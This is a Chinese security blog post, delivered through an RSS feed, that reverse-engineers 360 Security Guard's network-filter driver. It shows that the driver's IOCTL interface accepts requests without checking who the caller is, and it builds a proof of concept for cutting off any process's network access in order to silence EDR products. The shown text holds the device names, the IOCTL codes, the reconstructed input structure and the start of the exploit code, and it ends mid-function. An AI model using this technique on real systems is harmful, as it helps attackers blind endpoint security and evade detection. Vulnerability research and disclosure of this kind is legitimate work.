<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>41group</title>
    <link>https://wechat2rss.xlab.app/feed/d840d8b21d5635eb5b332a61f472de54579c8a30.xml</link>
    <description>不器网安，君子不器。&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (41group)</managingEditor>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM7nWvGkwibWJB213BFpBYtib15FicL6NVPlLFegzTY8EKyDw/0</url>
      <title>41group</title>
      <link>https://wechat2rss.xlab.app/feed/d840d8b21d5635eb5b332a61f472de54579c8a30.xml</link>
    </image>
    <item>
      <title>利用360驱动阻断EDR网络连接</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484273&amp;idx=1&amp;sn=01fd0ab06f509d5c7c73f7628c025104</link>
      <description>闲来无事发个水文，记录一下特殊情况下分析360安全卫士过程中觉得可以公开的一个点。在对 `360netmon</description>
      <content:encoded><![CDATA[<p><span>可以遐想</span> <span>2026-02-11 01:20</span> <span style="display: inline-block;">安徽</span></p>




  <p>以下文章来源于：遐想的小窝</p>
  <strong>遐想的小窝</strong>
  <p>曾专注红队对抗和武器化开发，现懒癌晚期，随缘研究。</p>



  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=79c23d34&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Frf1YTqFEx5JglBNXum8bWiaJfNwyuDdriaIu0XUZDv5cDgJMJ2eOO9t5d9XXL4c0arWoobsgE91PKrgyeFV1PvqaiamNTdVOa9Hxy4k3wJsQo0%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p data-layout-id="0" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">闲来无事发个水文，记录一下特殊情况下分析360安全卫士过程中觉得可以公开的一个点。</span></p><p data-layout-id="1" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">在对 `360netmon_x64_wfp.sys` 进行逆向工程时，我首先定位到驱动的入口点 `DriverEntry`，发现驱动创建了两个设备对象：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="swift"><code><span leaf=""><span class="code-snippet__type">IoCreateDevice</span>(<span class="code-snippet__type">DriverObject</span>, <span class="code-snippet__number">0</span>, <span class="code-snippet__type">L</span><span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">Device</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">360TdiFilter&#34;</span>, 0x22u, <span class="code-snippet__number">0</span>, <span class="code-snippet__number">0</span>, <span class="code-snippet__operator">&amp;</span>deviceObject);</span></code><br/><code><span leaf=""><span class="code-snippet__type">IoCreateSymbolicLink</span>(<span class="code-snippet__type">L</span><span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">DosDevices</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">360TdiFilter&#34;</span>, <span class="code-snippet__type">L</span><span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">Device</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">360TdiFilter&#34;</span>);</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""><span class="code-snippet__type">IoCreateDevice</span>(<span class="code-snippet__type">DriverObject</span>, <span class="code-snippet__number">0</span>, <span class="code-snippet__type">L</span><span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">Device</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">360TdiSpeed&#34;</span>, 0x22u, <span class="code-snippet__number">0</span>, <span class="code-snippet__number">0</span>, <span class="code-snippet__operator">&amp;</span>qword_25320);</span></code><br/><code><span leaf=""><span class="code-snippet__type">IoCreateSymbolicLink</span>(<span class="code-snippet__type">L</span><span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">DosDevices</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">360TdiSpeed&#34;</span>, <span class="code-snippet__type">L</span><span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">Device</span><span class="code-snippet__string"><span class="code-snippet__subst">\\</span></span><span class="code-snippet__string">360TdiSpeed&#34;</span>);</span></code><br/></pre></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="3"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100000086" data-ratio="0.32150537634408605" data-s="300,640" type="block" data-type="png" data-w="930" src="https://wechat2rss.xlab.app/img-proxy/?k=5fa1a4d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Frf1YTqFEx5JpwNwWBPuFrenSarcnFZH3W9VBNicQ1EdCPrrokvpCyDEQG1o6y4ZxuUzI998d7nIT9zicNzIyVkicVBjlOGibcKU6uJ7kcSiaf7Fw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="4" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">这两个设备可以从用户态通过符号链接 `\\\\.\\\\360TdiFilter` 和 `\\\\.\\\\360TdiSpeed` 访问。</span></p><p data-layout-id="5" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">这个驱动注册了多个 IRP 处理函数，其中 `IrpMjDeviceControl` 处理函数（地址 `0x12374`）负责处理所有 IOCTL 请求。</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="6"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6682926829268293" data-s="300,640" data-type="png" data-w="1025" type="block" data-imgfileid="100000087" src="https://wechat2rss.xlab.app/img-proxy/?k=88ed8169&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Frf1YTqFEx5L0xB8wfFQaTRjh8ZVHG1ibibM4EcWjnuABqprnjRmk7BCJOKwCZ5G3fsBgQ6lXW8oicHlrLUzBqcxBNmgE66wI3JMhtMftzyLfLw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="7" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">在 IrpMjDeviceControl 的入口处，代码仅验证设备对象是否匹配，完全没有调用者身份验证：</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="8"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2665036674816626" data-s="300,640" data-type="png" data-w="409" type="block" data-imgfileid="100000088" src="https://wechat2rss.xlab.app/img-proxy/?k=e35366a1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2Frf1YTqFEx5KBZLDFyUhR2RTzM8NkXKewssC1nvgIuGwibaUaR5F87bZ2tFDBCAZAhS4GrcPiaXXQDp4nkwXicxhFo4AxrC7pfpicfxNOEOGKJA0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="makefile"><code><span leaf=""><span class="code-snippet__section">123D8: mov rcx, cs:g_pDeviceObject_TdiFilter</span></span></code><br/><code><span leaf=""><span class="code-snippet__section">123DF: cmp rdi, rcx ; 仅验证设备对象</span></span></code><br/><code><span leaf=""><span class="code-snippet__section">123E2: jz short loc_12422</span></span></code><br/></pre></p><p data-layout-id="10" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">既然如此我们就不得不去分析 IOCTL 接口实现进一步的利用。因为我们通过驱动的信息已经知道这个WFP驱动的用途，所以我们的预期就是任意的阻断网络功能。</span></p><p data-layout-id="11" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">很快我们的目光就到了 IOCTL 0x220804:身上，我们猜测功能是设置进程网络限速/阻断。于是细细地看了一下。</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="12"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4962962962962963" data-s="300,640" data-type="png" data-w="675" type="block" data-imgfileid="100000089" src="https://wechat2rss.xlab.app/img-proxy/?k=179cc8bd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2Frf1YTqFEx5J9VXd6l6hibtrIdYoc3oh0DTJ7QoylenXIeJ69nyibOkVkcc7TLT7k23icMVCL5IGdHUORVe4vkeIxnGpUX9zoCDMSpPPwaGoobM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="13"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7686274509803922" data-s="300,640" data-type="png" data-w="255" type="block" data-imgfileid="100000090" src="https://wechat2rss.xlab.app/img-proxy/?k=5d805c7c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2Frf1YTqFEx5IQlnpKtrd4icmemfNB0aib17vGJfpQIC9diadweoEcsVAXoQbTTzFU20DNf2gj53Ko54nNEYDevHHmr9xvadDRV6RXwhkadKKs4c%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="14" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">跟进sub_18BB8方法，我们发现它会：</span></p><ul style="font-size: 15px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" class="list-paddingleft-1"><li style="margin-bottom: 0px;"><p data-layout-id="15" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">解析用户提供的进程路径</span></p></li><li style="margin-bottom: 0px;"><p data-layout-id="16" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">在进程hash表中查找或创建进程节点</span></p></li><li style="margin-bottom: 0px;"><p data-layout-id="17" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">设置进程的限速配置字段</span></p></li><li style="margin-bottom: 0px;"><p data-layout-id="18" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">如果 qwBlockCnnt 设置为 LLONG_MAX，则完全阻断网络</span></p></li></ul><p data-layout-id="19" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">IOCTL 0x220444 则主要负责WFP 过滤器操作，用来动态添加/删除 WFP 过滤规则，我们直接摸进sub_1D45C。</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="20"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7296747967479674" data-s="300,640" data-type="png" data-w="984" type="block" data-imgfileid="100000091" src="https://wechat2rss.xlab.app/img-proxy/?k=a4be601e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Frf1YTqFEx5Kv9xibqxTGAXKa2p0erBOH1LSj29x5ERHE2EzfShxgickjHFWdP8bDw2WFeq5GN0Srr3FjCXZYm51aa0BjOXYWBMgrRJbuhbyH4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="objectivec"><code><span leaf="">NTSTATUS __fastcall sub_1D45C(<span class="code-snippet__type">int</span> a1)</span></code><br/><code><span leaf="">{</span></code><br/><code><span leaf=""> NTSTATUS v7;</span></code><br/><code><span leaf=""> <span class="code-snippet__type">char</span> v1, v2, v3, v4;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 检查 Windows 版本（仅支持 Win10 1607+）</span></span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (g_WindowsBuildNumber &lt; <span class="code-snippet__number">0x23F0</span>) <span class="code-snippet__comment">// Build 9200</span></span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">return</span> STATUS_NOT_IMPLEMENTED;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 检查是否已经是相同模式</span></span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (dword_6B78C == a1)</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">return</span> STATUS_SUCCESS;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 检查 WFP 引擎句柄</span></span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (!engineHandle)</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">return</span> STATUS_DEVICE_NOT_READY;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 开始 WFP 事务</span></span></code><br/><code><span leaf=""> v7 = FwpmTransactionBegin0(engineHandle, <span class="code-snippet__number">0</span>);</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (v7 &lt; <span class="code-snippet__number">0</span>)</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">return</span> v7;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (a1) { <span class="code-snippet__comment">// 启用过滤</span></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 注册 4 个 WFP Callout (Established V4/V6, Datagram V4/V6)</span></span></code><br/><code><span leaf=""> v7 = sub_1D1E8(qword_6B790, &amp;xmmword_236D0, &amp;calloutId);</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (v7 &lt; <span class="code-snippet__number">0</span> &amp;&amp; v7 != STATUS_FWP_ALREADY_EXISTS)</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">goto</span> <span class="code-snippet__built_in">CLEANUP</span>;</span></code><br/><code><span leaf=""> v1 = <span class="code-snippet__number">1</span>;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> v7 = sub_1D1E8(qword_6B790, &amp;xmmword_236E0, &amp;dword_6B10C);</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (v7 &lt; <span class="code-snippet__number">0</span> &amp;&amp; v7 != STATUS_FWP_ALREADY_EXISTS)</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">goto</span> <span class="code-snippet__built_in">CLEANUP</span>;</span></code><br/><code><span leaf=""> v2 = <span class="code-snippet__number">1</span>;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> v7 = sub_1D1E8(qword_6B790, &amp;xmmword_236F0, &amp;dword_6B750);</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (v7 &lt; <span class="code-snippet__number">0</span> &amp;&amp; v7 != STATUS_FWP_ALREADY_EXISTS)</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">goto</span> <span class="code-snippet__built_in">CLEANUP</span>;</span></code><br/><code><span leaf=""> v3 = <span class="code-snippet__number">1</span>;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> v7 = sub_1D1E8(qword_6B790, &amp;xmmword_23700, &amp;dword_6B754);</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (v7 &lt; <span class="code-snippet__number">0</span> &amp;&amp; v7 != STATUS_FWP_ALREADY_EXISTS)</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">goto</span> <span class="code-snippet__built_in">CLEANUP</span>;</span></code><br/><code><span leaf=""> v4 = <span class="code-snippet__number">1</span>;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 添加 4 个 WFP Filter</span></span></code><br/><code><span leaf=""> v7 = sub_1CF28(..., engineHandle, <span class="code-snippet__number">0</span>, &amp;dword_6B7A0);</span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// ... (重复为其他3个过滤器)</span></span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> } <span class="code-snippet__keyword">else</span> { <span class="code-snippet__comment">// 禁用过滤</span></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 删除所有过滤器和 Callout</span></span></code><br/><code><span leaf=""> v7 = FwpmFilterDeleteById0(engineHandle, <span class="code-snippet__type">id</span>);</span></code><br/><code><span leaf=""> v7 = FwpmFilterDeleteById0(engineHandle, qword_6B7C0);</span></code><br/><code><span leaf=""> v7 = FwpmCalloutDeleteById0(engineHandle, dword_6B7A0);</span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// ...</span></span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> sub_1E288(); <span class="code-snippet__comment">// 清理内部状态</span></span></code><br/><code><span leaf=""> FwpsCalloutUnregisterById0(calloutId);</span></code><br/><code><span leaf=""> FwpsCalloutUnregisterById0(dword_6B10C);</span></code><br/><code><span leaf=""> FwpsCalloutUnregisterById0(dword_6B750);</span></code><br/><code><span leaf=""> FwpsCalloutUnregisterById0(dword_6B754);</span></code><br/><code><span leaf=""> }</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 提交 WFP 事务</span></span></code><br/><code><span leaf=""> v7 = FwpmTransactionCommit0(engineHandle);</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (v7 &gt;= <span class="code-snippet__number">0</span>)</span></code><br/><code><span leaf=""> dword_6B78C = a1; <span class="code-snippet__comment">// 保存当前模式</span></span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""><span class="code-snippet__built_in">CLEANUP</span>:</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (v7 &lt; <span class="code-snippet__number">0</span>) {</span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 失败时回滚并清理已注册的 Callout</span></span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (v1) FwpsCalloutUnregisterById0(calloutId);</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (v2) FwpsCalloutUnregisterById0(dword_6B10C);</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (v3) FwpsCalloutUnregisterById0(dword_6B750);</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (v4) FwpsCalloutUnregisterById0(dword_6B754);</span></code><br/><code><span leaf=""> FwpmTransactionAbort0(engineHandle);</span></code><br/><code><span leaf=""> }</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">return</span> v7;</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><p data-layout-id="22" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">也就是说：</span></p><ul style="font-size: 15px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" class="list-paddingleft-1"><li style="margin-bottom: 0px;"><p data-layout-id="23" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">这玩意儿在 WFP 层级动态注册/注销 Callout 和 Filter</span></p></li><li style="margin-bottom: 0px;"><p data-layout-id="24" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">Callout 在 FWPM_LAYER_ALE_FLOW_ESTABLISHED_V4/V6和</span></p></li><li style="margin-bottom: 0px;"><p data-layout-id="25" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">FWPM_LAYER_ALE_AUTH_CONNECT_V4/V6 层拦截</span></p></li><li style="margin-bottom: 0px;"><p data-layout-id="26" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">没有验证调用者权限，任何管理员进程都可以调用</span></p></li></ul><p data-layout-id="27" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">驱动通过以下流程实现网络阻断：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="sql"><code><span leaf=""><br/></span></code><br/><code><span leaf="">用户态应用 (Pwn.exe)</span></code><br/><code><span leaf=""> ↓ DeviceIoControl(<span class="code-snippet__number">0x220804</span>, <span class="code-snippet__operator">&amp;</span>LIMIT_SPEED)</span></code><br/><code><span leaf="">┌───▼─────────────────────────────┐</span></code><br/><code><span leaf="">│ IrpMjDeviceControl │</span></code><br/><code><span leaf="">│ @ <span class="code-snippet__number">0x12374</span> │</span></code><br/><code><span leaf="">└───┬─────────────────────────────┘</span></code><br/><code><span leaf=""> ↓ <span class="code-snippet__keyword">call</span> sub_18BB8</span></code><br/><code><span leaf="">┌───▼─────────────────────────────┐</span></code><br/><code><span leaf="">│ 解析进程路径并查找哈希表 │</span></code><br/><code><span leaf="">│ LookupProcessInHashTable() │</span></code><br/><code><span leaf="">└───┬─────────────────────────────┘</span></code><br/><code><span leaf=""> ↓ 更新进程节点</span></code><br/><code><span leaf="">┌───▼─────────────────────────────┐</span></code><br/><code><span leaf="">│ ProcessNode<span class="code-snippet__operator">-&gt;</span>qwBlockCnnt <span class="code-snippet__operator">=</span> MAX │</span></code><br/><code><span leaf="">│ ProcessNode<span class="code-snippet__operator">-&gt;</span>nLimitSend <span class="code-snippet__operator">=</span> MAX │</span></code><br/><code><span leaf="">│ ProcessNode<span class="code-snippet__operator">-&gt;</span>nLimitRecv <span class="code-snippet__operator">=</span> MAX │</span></code><br/><code><span leaf="">│ ProcessNode<span class="code-snippet__operator">-&gt;</span>bCancelFlag <span class="code-snippet__operator">=</span> <span class="code-snippet__literal">FALSE</span> │</span></code><br/><code><span leaf="">└───┬─────────────────────────────┘</span></code><br/><code><span leaf=""> ↓</span></code><br/><code><span leaf=""> 等待目标进程产生网络活动</span></code><br/><code><span leaf=""> ↓</span></code><br/><code><span leaf="">┌───▼─────────────────────────────┐</span></code><br/><code><span leaf="">│ WFP Callout 拦截点 │</span></code><br/><code><span leaf="">│ (网络包发送<span class="code-snippet__operator">/</span>接收时触发) │</span></code><br/><code><span leaf="">└───┬─────────────────────────────┘</span></code><br/><code><span leaf=""> ↓ 查询限速配置</span></code><br/><code><span leaf="">┌───▼─────────────────────────────┐</span></code><br/><code><span leaf="">│ if (ProcessNode<span class="code-snippet__operator">-&gt;</span>qwBlockCnnt │</span></code><br/><code><span leaf="">│ <span class="code-snippet__operator">==</span> LLONG_MAX) │</span></code><br/><code><span leaf="">│ <span class="code-snippet__keyword">return</span> FWP_ACTION_BLOCK; │</span></code><br/><code><span leaf="">└──────────────────────────────────┘</span></code><br/><code><span leaf=""> ↓</span></code><br/><code><span leaf=""> 网络包被丢弃，进程无法联网</span></code><br/><code></code><br/></pre></p><p data-layout-id="29" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">现在开始搓POC</span></p><p data-layout-id="30" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">通过逆向分析和动态调试，我们重建了驱动期望的数据结构：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="objectivec"><code><span leaf=""><br/></span></code><br/><code><span leaf=""><span class="code-snippet__meta">#</span><span class="code-snippet__meta"><span class="code-snippet__keyword">pragma</span></span><span class="code-snippet__meta"> pack(push, 4)</span></span></code><br/><code><span leaf=""><span class="code-snippet__keyword">typedef</span> <span class="code-snippet__keyword">struct</span> _PACK {</span></code><br/><code><span leaf=""> WCHAR szNtPath[MAX_PATH + <span class="code-snippet__number">40</span>]; <span class="code-snippet__comment">// +0x000: NT格式路径 (e.g., \WINDOWS\SYSTEM32\NOTEPAD.EXE)</span></span></code><br/><code><span leaf=""> WCHAR szPath[MAX_PATH]; <span class="code-snippet__comment">// +0x228: DOS格式路径 (e.g., C:\Windows\System32\notepad.exe)</span></span></code><br/><code><span leaf=""> <span class="code-snippet__type">BOOL</span> bCancelFlag; <span class="code-snippet__comment">// +0x428: TRUE=解除限制, FALSE=应用限制</span></span></code><br/><code><span leaf=""> LONGLONG qwBlockCnnt; <span class="code-snippet__comment">// +0x430: 阻断计数器 (LLONG_MAX = 完全阻断)</span></span></code><br/><code><span leaf=""> LONGLONG nLimitSend; <span class="code-snippet__comment">// +0x438: 上传速度限制 (字节/秒)</span></span></code><br/><code><span leaf=""> LONGLONG nLimitRecv; <span class="code-snippet__comment">// +0x440: 下载速度限制 (字节/秒)</span></span></code><br/><code><span leaf=""> DWORD dwZeroCheck; <span class="code-snippet__comment">// +0x448: 保留字段 (必须为0)</span></span></code><br/><code><span leaf="">} PACK, *PPACK;</span></code><br/><code><span leaf=""><span class="code-snippet__meta">#</span><span class="code-snippet__meta"><span class="code-snippet__keyword">pragma</span></span><span class="code-snippet__meta"> pack(pop)</span></span></code><br/><code></code><br/></pre></p><p data-layout-id="32" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">后面的就很简单了，只需要这样那样就可以了:</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="objectivec"><code><span leaf=""><span class="code-snippet__type">BOOL</span> BlockProcessNetwork(<span class="code-snippet__keyword">const</span> WCHAR *szImagePath) {</span></code><br/><code><span leaf=""> HANDLE hDevice;</span></code><br/><code><span leaf=""> PACK ls;</span></code><br/><code><span leaf=""> DWORD dwBytesReturned;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 1. 打开驱动设备对象</span></span></code><br/><code><span leaf=""> hDevice = CreateFileW(</span></code><br/><code><span leaf=""> L<span class="code-snippet__string">&#34;\\\\.\\360TdiFilter&#34;</span>,</span></code><br/><code><span leaf=""> GENERIC_READ | GENERIC_WRITE,</span></code><br/><code><span leaf=""> FILE_SHARE_READ | FILE_SHARE_WRITE,</span></code><br/><code><span leaf=""> <span class="code-snippet__literal">NULL</span>,</span></code><br/><code><span leaf=""> OPEN_EXISTING,</span></code><br/><code><span leaf=""> <span class="code-snippet__number">0</span>,</span></code><br/><code><span leaf=""> <span class="code-snippet__literal">NULL</span></span></code><br/><code><span leaf=""> );</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (hDevice == INVALID_HANDLE_VALUE) {</span></code><br/><code><span leaf=""> printf(<span class="code-snippet__string">&#34;[!] Failed to open device (Error: %lu)\n&#34;</span>, GetLastError());</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">return</span> <span class="code-snippet__literal">FALSE</span>;</span></code><br/><code><span leaf=""> }</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 2. 启用驱动监控功能（可选，驱动可能已启用）</span></span></code><br/><code><span leaf=""> DeviceIoControl(hDevice, <span class="code-snippet__number">0x220408</span>, <span class="code-snippet__literal">NULL</span>, <span class="code-snippet__number">0</span>, <span class="code-snippet__literal">NULL</span>, <span class="code-snippet__number">0</span>, &amp;dwBytesReturned, <span class="code-snippet__literal">NULL</span>);</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 3. 构造限速/阻断结构体</span></span></code><br/><code><span leaf=""> ZeroMemory(&amp;ls, <span 